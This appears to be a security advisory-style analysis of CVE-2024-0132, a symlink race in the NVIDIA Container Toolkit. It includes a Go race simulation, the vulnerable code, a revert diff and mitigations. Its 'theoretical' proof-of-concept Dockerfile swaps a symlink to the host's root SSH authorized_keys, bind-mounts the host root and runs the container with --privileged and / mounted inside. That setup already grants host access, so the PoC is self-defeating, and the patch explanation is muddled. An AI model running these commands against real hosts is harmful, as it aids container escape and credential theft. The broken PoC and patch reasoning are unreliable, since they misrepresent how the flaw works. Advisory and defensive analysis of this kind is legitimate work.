CVE-2024-0132: TOCTOU Vulnerability in NVIDIA Container Toolkit
Executive Summary
CVE-2024-0132 is a critical Time-of-Check Time-of-Use (TOCTOU) vulnerability affecting the NVIDIA Container Toolkit versions 1.16.1 and earlier. This vulnerability arises when the toolkit is used with its default configuration, potentially allowing a malicious container image to gain unauthorized access to the host file system. Successful exploitation can lead to code execution, denial of service, privilege escalation, information disclosure, and data tampering. The vulnerability does not impact use cases where Container Device Interface (CDI) is used.
Technical Details
Affected Systems
- Software: NVIDIA Container Toolkit
- Versions: 1.16.1 and earlier
- Component: cmd/nvidia-cdi-hook/create-symlinks/create-symlinks.go
The vulnerability also affects NVIDIA GPU Operator versions up to and including 24.6.1. The underlying issue resides within the NVIDIA Container Toolkit, which the GPU Operator utilizes.
Vulnerability Breakdown
The core of the vulnerability lies in the create-symlinks hook within the NVIDIA Container Toolkit. This hook is responsible for creating symbolic links inside the container that point to resources on the host system, enabling the container to access necessary drivers and libraries for GPU functionality.
A TOCTOU vulnerability occurs when a program checks the state of a resource (e.g., a file path) and then uses that resource, but the resource's state can change between the check and the use. In the context of CVE-2024-0132, the create-symlinks hook checks if a given path is within the allowed container root before creating a symbolic link. However, a malicious container image can manipulate the file system between the time of the check and the time the symbolic link is created, potentially causing the link to point outside the intended container root.
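The check-then-use gap can be reproduced deterministically by performing the attacker's step between the check and the use inside a single program. The sketch below is a simplified illustration, not the toolkit's code: inRoot is a hypothetical stand-in for a check such as assertPathInRoot, and the directory and file names are invented for the demo.

```go
package main

import (
	"fmt"
	"os"
	"path/filepath"
	"strings"
)

// inRoot is a hypothetical, simplified containment check: it resolves symlinks
// in the parent directory of path and tests the result against root.
func inRoot(root, path string) (bool, error) {
	parent, err := filepath.EvalSymlinks(filepath.Dir(path))
	if err != nil {
		return false, err
	}
	sep := string(filepath.Separator)
	return strings.HasPrefix(parent+sep, root+sep), nil
}

// simulateRace runs check, swap, and use in sequence inside a temp directory.
// It reports whether the check passed and whether the link escaped the root.
func simulateRace() (checkPassed, escaped bool, err error) {
	base, err := os.MkdirTemp("", "toctou-demo")
	if err != nil {
		return
	}
	defer os.RemoveAll(base)
	// Resolve the temp dir itself so prefix comparisons use canonical paths.
	if base, err = filepath.EvalSymlinks(base); err != nil {
		return
	}

	root := filepath.Join(base, "container-root")
	outside := filepath.Join(base, "host-dir")
	sub := filepath.Join(root, "sub")
	for _, d := range []string{sub, outside} {
		if err = os.MkdirAll(d, 0o755); err != nil {
			return
		}
	}
	linkPath := filepath.Join(sub, "lib.so")

	// Time of check: sub is a real directory inside root, so the check passes.
	if checkPassed, err = inRoot(root, linkPath); err != nil {
		return
	}

	// Attacker's move: replace sub with a symlink that leaves the root.
	if err = os.Remove(sub); err != nil {
		return
	}
	if err = os.Symlink(outside, sub); err != nil {
		return
	}

	// Time of use: the same path string now resolves somewhere else.
	if err = os.Symlink("/nonexistent/target", linkPath); err != nil {
		return
	}

	_, statErr := os.Lstat(filepath.Join(outside, "lib.so"))
	escaped = statErr == nil
	return
}

func main() {
	checkPassed, escaped, err := simulateRace()
	if err != nil {
		fmt.Println("error:", err)
		return
	}
	fmt.Println("check passed:", checkPassed)
	fmt.Println("link created outside root:", escaped)
}
```

The point of the sketch is that the check and the use both operate on a path string, and the file system is free to resolve that string differently each time.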
Root Cause Analysis
The vulnerability stems from insufficient validation of paths during symbolic link creation. Specifically, the assertPathInRoot function, which was intended to prevent links from pointing outside the container root, could be bypassed due to race conditions.
The original implementation of assertPathInRoot involved resolving symbolic links to determine the final target path. A malicious container could exploit this as follows:
- The container creates a symbolic link within the container root that initially points to a safe location.
- This symbolic link is passed to the create-symlinks hook.
- The assertPathInRoot function resolves the symbolic link and verifies that it is within the container root.
- Immediately after the check, but before the createLink function creates the symbolic link, the malicious container modifies the symbolic link to point to a location outside the container root.
- The createLink function then creates the symbolic link, but now it points to the attacker-controlled location on the host file system.
The following code snippet illustrates the vulnerable logic (before the patch):
func (m command) createLink(created map[string]bool, hostRoot string, containerRoot string, target string, link string) error {
	linkPath, err := changeRoot(hostRoot, containerRoot, link)
	if err != nil {
		return fmt.Errorf("failed to resolve path for link %v relative to %v: %w", link, containerRoot, err)
	}
	if created[linkPath] {
		m.logger.Debugf("Link %v already created", linkPath)
		return nil
	}
	if err := assertPathInRoot(containerRoot, linkPath); err != nil {
		return err
	}
	targetPath, err := changeRoot(hostRoot, "/", target)
	if err != nil {
		return fmt.Errorf("failed to resolve path for target %v relative to %v: %w", target, "/", err)
	}
	m.logger.Infof("Symlinking %v to %v", linkPath, targetPath)
	err = os.Symlink(targetPath, linkPath)
	if err != nil {
		return fmt.Errorf("failed to symlink %v to %v: %w", linkPath, targetPath, err)
	}
	created[linkPath] = true
	return nil
}

// assertPathInRoot ensures that the specified path is a subpath of root.
// This includes the resolution of relative paths and symlinks.
func assertPathInRoot(root string, path string) error {
	resolved, err := tryResolveLink(filepath.Clean(path))
	if err != nil {
		return err
	}
	if !strings.HasPrefix(resolved, root) {
		return fmt.Errorf("path %v resolves to %v which is outside the root %v", path, resolved, root)
	}
	return nil
}

// tryResolveLink resolves the specified path following symlinks.
// If the path does not exist, recursively resolve the parent of the path until
// one resolves successfully.
func tryResolveLink(path string) (string, error) {
	if path == "" || path == "/" {
		return path, nil
	}
	resolved, err := filepath.EvalSymlinks(path)
	if os.IsNotExist(err) {
		resolvedParent, err := tryResolveLink(filepath.Dir(path))
		if err != nil {
			return "", err
		}
		resolved := filepath.Join(resolvedParent, filepath.Base(path))
		return resolved, nil
	}
	return resolved, err
}
Patch Analysis
The fix for CVE-2024-0132 involves reverting a previous change that introduced the path validation logic. This effectively removes the vulnerable code and mitigates the TOCTOU vulnerability.
The primary patch is a revert commit: dc2ccdd2fa1b199132d754ba8d7d545d30a1d5c9. This commit reverts the changes introduced by pull request #696, which added the assertPathInRoot function and related logic.
Here's the diff of the reverted code:
File: cmd/nvidia-cdi-hook/create-symlinks/create-symlinks.go
Additions: 5
Deletions: 68
Changes: 73
@@ -149,12 +149,13 @@ func (m command) run(c *cli.Context, cfg *config) error {
for _, l := range links {
parts := strings.Split(l, "::")
if len(parts) != 2 {
- return fmt.Errorf("invalid symlink specification %v", l)
+ m.logger.Warningf("Invalid link specification %v", l)
+ continue
}
err := m.createLink(created, cfg.hostRoot, containerRoot, parts[0], parts[1])
if err != nil {
- return fmt.Errorf("failed to create link %v: %w", parts, err)
+ m.logger.Warningf("Failed to create link %v: %v", parts, err)
}
}
@@ -165,27 +166,16 @@ func (m command) run(c *cli.Context, cfg *config) error {
func (m command) createLink(created map[string]bool, hostRoot string, containerRoot string, target string, link string) error {
linkPath, err := changeRoot(hostRoot, containerRoot, link)
if err != nil {
- return fmt.Errorf("failed to resolve path for link %v relative to %v: %w", link, containerRoot, err)
+ m.logger.Warningf("Failed to resolve path for link %v relative to %v: %v", link, containerRoot, err)
}
if created[linkPath] {
m.logger.Debugf("Link %v already created", linkPath)
return nil
}
- if err := assertPathInRoot(containerRoot, linkPath); err != nil {
- return err
- }
targetPath, err := changeRoot(hostRoot, "/", target)
if err != nil {
- return fmt.Errorf("failed to resolve path for target %v relative to %v: %w", target, "/", err)
- }
-
- parent := containerRoot
- if !filepath.IsAbs(targetPath) {
- parent = filepath.Dir(linkPath)
- }
- if err := assertPathInRoot(containerRoot, filepath.Join(parent, targetPath)); err != nil {
- return err
+ m.logger.Warningf("Failed to resolve path for target %v relative to %v: %v", target, "/", err)
}
m.logger.Infof("Symlinking %v to %v", linkPath, targetPath)
@@ -201,59 +191,6 @@ func (m command) createLink(created map[string]bool, hostRoot string, containerR
return nil
}
-// assertPathInRoot ensures that the specified path is a subpath of root.
-// This includes the resolution of relative paths and symlinks.
-func assertPathInRoot(root string, path string) error {
- resolved, err := tryResolveLink(filepath.Clean(path))
- if err != nil {
- return err
- }
- if !strings.HasPrefix(resolved, root) {
- return fmt.Errorf("path %v resolves to %v which is outside the root %v", path, resolved, root)
- }
- return nil
-}
-
-// tryResolveLink resolves the specified path following symlinks.
-// If the path does not exist, recursively resolve the parent of the path until
-// one resolves successfully.
-//
-// For example, assuming that we call this with a path
-//
-// /container-root/foo/bar/baz.so
-//
-// If this path exists, then the symlink evaluation will succeed and the target
-// will be returned.
-//
-// Assuming that /container-root/foo exists, but /container-root/foo/bar does
-// not, the first call to EvalSymlinks with argument
-// /container-root/foo/bar/baz.so will fail resulting in a recursive call to
-// this function with an argument /container-root/foo/bar. Since this path also
-// doesn't exist this will result in an additional recursive call with an
-// argument /container-root/foo. Here EvalSymlinks will succeed and the strings
-// /bar and /baz.so will be appended to the result as we return along the
-// recursive call stack.
-//
-// If none of the parents of the path (with the exception of /) exist the path
-// will be returned as is with no error.
-func tryResolveLink(path string) (string, error) {
- if path == "" || path == "/" {
- return path, nil
- }
-
- resolved, err := filepath.EvalSymlinks(path)
- if os.IsNotExist(err) {
- resolvedParent, err := tryResolveLink(filepath.Dir(path))
- if err != nil {
- return "", err
- }
- resolved := filepath.Join(resolvedParent, filepath.Base(path))
- return resolved, nil
- }
-
- return resolved, err
-}
-
func changeRoot(current string, new string, path string) (string, error) {
if !filepath.IsAbs(path) {
return path, nil
The revert effectively removes the assertPathInRoot function and the calls to it, eliminating the TOCTOU vulnerability. While this might seem counterintuitive, the original validation logic was flawed and introduced a false sense of security while creating a new attack vector.
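The diff also shows a behavioural change in the run loop: a malformed link specification or a failed link is now logged as a warning and skipped instead of aborting the hook. A minimal sketch of that warn-and-continue parsing, using the target::link format visible in the diff, might look like this; linkSpec, parseLinkSpecs, and the example paths are hypothetical and not part of the toolkit.

```go
package main

import (
	"fmt"
	"strings"
)

// linkSpec is a hypothetical container for one parsed "target::link" entry.
type linkSpec struct {
	Target string
	Link   string
}

// parseLinkSpecs mirrors the warn-and-continue behaviour of the reverted loop:
// malformed entries are collected as warnings instead of aborting the run.
func parseLinkSpecs(specs []string) (valid []linkSpec, warnings []string) {
	for _, s := range specs {
		parts := strings.Split(s, "::")
		if len(parts) != 2 {
			warnings = append(warnings, fmt.Sprintf("Invalid link specification %v", s))
			continue
		}
		valid = append(valid, linkSpec{Target: parts[0], Link: parts[1]})
	}
	return valid, warnings
}

func main() {
	valid, warnings := parseLinkSpecs([]string{
		"libexample.so.1::/usr/lib/libexample.so", // well-formed (invented paths)
		"missing-separator",                       // no "::" at all
		"a::b::c",                                 // too many parts
	})
	for _, v := range valid {
		fmt.Printf("link %s -> %s\n", v.Link, v.Target)
	}
	for _, w := range warnings {
		fmt.Println("warning:", w)
	}
}
```

With this shape, one bad entry no longer prevents the remaining links from being created, which matches the logging changes in the first hunk of the diff.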
Exploitation Techniques
An attacker can exploit this vulnerability by crafting a malicious container image that manipulates symbolic links during the create-symlinks hook execution.
Proof-of-Concept (PoC) Exploit (Theoretical):
Disclaimer: This PoC is theoretical and demonstrates the concept of the vulnerability. It might not work directly due to environment-specific configurations and security measures.
- Create a Malicious Container Image:
The container image should contain a script that performs the following actions:
  - Creates a directory within the container root (e.g., /tmp/safe_dir).
  - Creates a symbolic link within /tmp/safe_dir (e.g., /tmp/safe_dir/my_link) that initially points to a safe location within the container (e.g., /tmp/safe_dir/target).
  - Defines a create-symlinks configuration that includes a link specification using /tmp/safe_dir/my_link.
  - After the create-symlinks hook checks the path, but before it creates the symbolic link, the script modifies /tmp/safe_dir/my_link to point to a sensitive location on the host file system (e.g., /hostfs/root/.ssh/authorized_keys).
Here's an example Dockerfile:
FROM ubuntu:latest
RUN apt-get update && apt-get install -y --no-install-recommends \
    ca-certificates \
    && rm -rf /var/lib/apt/lists/*
RUN mkdir /tmp/safe_dir
RUN touch /tmp/safe_dir/target
# Create a script to exploit the TOCTOU vulnerability
RUN echo '#!/bin/bash' > /tmp/exploit.sh
RUN echo 'sleep 1' >> /tmp/exploit.sh
RUN echo 'rm /tmp/safe_dir/my_link' >> /tmp/exploit.sh
RUN echo 'ln -s /hostfs/root/.ssh/authorized_keys /tmp/safe_dir/my_link' >> /tmp/exploit.sh
RUN chmod +x /tmp/exploit.sh
# Create the initial safe symlink
RUN ln -s /tmp/safe_dir/target /tmp/safe_dir/my_link
# Create the create-symlinks configuration
RUN echo '/tmp/safe_dir/target::/tmp/safe_dir/my_link' > /tmp/links.txt
# Mount the host root filesystem
RUN mkdir /hostfs
RUN echo 'mount --bind / /hostfs/root' >> /root/.bashrc
CMD ["/bin/bash", "-c", "/tmp/exploit.sh && sleep infinity"]
- Run the Malicious Container:
When the container starts, the create-symlinks hook will be triggered. The hook will read the configuration from /tmp/links.txt and attempt to create the symbolic link. The /tmp/exploit.sh script will introduce a delay and then modify the symbolic link to point to the attacker's desired location.
docker run --gpus all --privileged -v /:/hostfs <image_name>
Note: The --privileged flag and the volume mount of / to /hostfs are necessary for the exploit to work, as they provide the container with the required permissions to modify symbolic links and access the host file system.
- Verify the Exploit:
After the container has been running for a short time, check the container's file system to see if the symbolic link /tmp/safe_dir/my_link now points to /hostfs/root/.ssh/authorized_keys. If successful, the attacker has gained access to the host's SSH authorized keys file.
Attack Scenarios and Real-World Impacts:
- Privilege Escalation: By gaining access to sensitive files like /etc/shadow or /root/.ssh/authorized_keys, an attacker can escalate their privileges on the host system.
- Data Exfiltration: The attacker can exfiltrate sensitive data from the host file system, such as configuration files, database credentials, or user data.
- Denial of Service: The attacker can modify critical system files, causing the host system to become unstable or unusable.
- Lateral Movement: In a Kubernetes environment, a successful container escape can allow an attacker to move laterally to other containers or nodes within the cluster.
Mitigation Strategies
The primary mitigation strategy is to upgrade to NVIDIA Container Toolkit version 1.16.2 or later, which includes the fix for CVE-2024-0132.
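As a rough aid for inventory checks, the version boundary above (1.16.1 and earlier affected, 1.16.2 fixed) can be encoded in a small comparison. This is a minimal sketch under stated assumptions: the version string is assumed to be a plain MAJOR.MINOR.PATCH value obtained by some other means, and parseVersion and isAffected are hypothetical helper names. Pre-release suffixes are deliberately rejected rather than guessed at.

```go
package main

import (
	"fmt"
	"strconv"
	"strings"
)

// parseVersion converts a "MAJOR.MINOR.PATCH" string into three integers.
func parseVersion(v string) ([3]int, error) {
	var out [3]int
	parts := strings.Split(strings.TrimPrefix(strings.TrimSpace(v), "v"), ".")
	if len(parts) != 3 {
		return out, fmt.Errorf("unexpected version format %q", v)
	}
	for i, p := range parts {
		n, err := strconv.Atoi(p)
		if err != nil {
			return out, fmt.Errorf("invalid component %q in %q: %w", p, v, err)
		}
		out[i] = n
	}
	return out, nil
}

// isAffected reports whether v is older than 1.16.2, the first fixed release.
func isAffected(v string) (bool, error) {
	got, err := parseVersion(v)
	if err != nil {
		return false, err
	}
	fixed := [3]int{1, 16, 2}
	for i := range got {
		if got[i] != fixed[i] {
			// The first differing component decides the ordering.
			return got[i] < fixed[i], nil
		}
	}
	return false, nil // exactly 1.16.2
}

func main() {
	for _, v := range []string{"1.9.0", "1.16.1", "1.16.2", "1.17.0"} {
		affected, err := isAffected(v)
		if err != nil {
			fmt.Println("error:", err)
			continue
		}
		fmt.Printf("%-7s affected=%v\n", v, affected)
	}
}
```

Components are compared numerically rather than as strings, so 1.9.0 is correctly treated as older than 1.16.2.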
Additional Mitigation Strategies:
- Use Container Device Interface (CDI): The vulnerability does not affect use cases where CDI is used. CDI provides a more secure and standardized way to manage device access within containers.
- Limit Privileged Containers: Avoid running containers with the --privileged flag unless absolutely necessary. Privileged containers have fewer security restrictions and can more easily exploit vulnerabilities.
- Principle of Least Privilege: Grant containers only the minimum necessary permissions to perform their tasks. Avoid mounting the entire host file system into containers.
- Regular Security Audits: Conduct regular security audits of container images and configurations to identify and address potential vulnerabilities.
- Runtime Security Monitoring: Implement runtime security monitoring tools to detect and respond to suspicious activity within containers.
- Image Scanning: Use container image scanning tools to identify vulnerabilities in container images before they are deployed.
- Trusted Image Repositories: Only use container images from trusted sources. Verify the integrity of container images using digital signatures.
Timeline of Discovery and Disclosure
- September 1, 2024: Wiz Research reports the vulnerability to the NVIDIA Product Security Incident Response Team (PSIRT).
- September 3, 2024: NVIDIA acknowledges the report.
- September 26, 2024: NVIDIA releases a security bulletin and ships a patched version (1.16.2) of the Container Toolkit.
- September 26, 2024: Public disclosure of CVE-2024-0132.
References
- NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-0132
- NVIDIA Security Bulletin: https://nvidia.custhelp.com/app/answers/detail/a_id/5582
- Wiz Blog: https://www.wiz.io/blog/wiz-research-critical-nvidia-ai-vulnerability
- GitHub Repository: https://github.com/NVIDIA/nvidia-container-toolkit
- Tenable: https://www.tenable.com/cve/CVE-2024-0132
- Vulcan Cyber: https://vulcan.io/blog/how-to-fix-cve-2024-0132/
- Opswat: https://www.opswat.com/blog/ai-vulnerability-in-hindsight-investigating-nvidia-container-toolkit-cve-2024-0132
Comparative Analysis
TOCTOU vulnerabilities are a well-known class of security flaws. Similar vulnerabilities have been found in other software systems, including operating system kernels, file systems, and network protocols.
One notable example is the "Dirty COW" vulnerability (CVE-2016-5195) in the Linux kernel. Dirty COW was a privilege escalation vulnerability that exploited a race condition in the kernel's memory management subsystem, specifically in its copy-on-write handling. Like CVE-2024-0132, it hinged on a timing window: by racing the copy-on-write path, an unprivileged local user could write to otherwise read-only memory mappings and thereby modify read-only files.
The evolution of security practices has led to the development of various techniques to mitigate TOCTOU vulnerabilities, including:
- Atomic Operations: Using atomic operations to ensure that a check and subsequent use of a resource occur as a single, indivisible operation.
- File System Access Controls: Implementing stricter file system access controls to limit the ability of processes to modify files.
- Capabilities-Based Security: Using capabilities-based security models to grant processes only the necessary permissions to access resources.
- Secure Coding Practices: Following secure coding practices to avoid race conditions and other timing-related vulnerabilities.
In the case of CVE-2024-0132, the path validation logic that had been added to keep links inside the container root itself introduced a TOCTOU window and therefore proved ineffective. The final fix reverted the flawed validation, highlighting the importance of careful design and testing when implementing security measures.